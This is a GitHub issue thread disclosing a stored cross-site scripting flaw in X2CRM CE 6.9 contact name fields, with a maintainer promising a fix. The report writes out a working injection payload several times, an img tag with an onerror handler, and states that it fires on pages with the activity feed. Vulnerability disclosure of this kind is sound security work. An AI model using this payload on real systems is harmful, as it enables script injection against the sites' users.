### ISSUE TITLE
Stored XSS in Contact firsname and last name

### ISSUE THREAD

**Issue by Fadavvi** [X2Engine/X2Engine#161]
Hi,

Description :

Create a contact with 

first name: test"><img src=x onerror=prompt('@darknetguy');>  

and 
last name : test2"><img src=x onerror=prompt('@darknetguy');> 

( you can even delete the contact its worst!) XSS will run in to all pages than activity feed is present. ( in X2CRM CE V6.9)

Sample Pic:
![2018-11-06_14-33-13](https://user-images.githubusercontent.com/21213484/48060574-a22be400-e1d1-11e8-97d4-1a076a0a1b78.png)

Payload to use : "><img src=x onerror=prompt('@darknetguy');>

Tested on Windows 10 Firefox | Google Chrome // Cent-OS 7 Firefox | Chromium 

BR,

Milad Fadavvi

**Comment by pczupil** [comment]
We will have this XSS fixed in our next release. Thank you for the info! I will keep this issue open until confirmation that the vector has been removed.
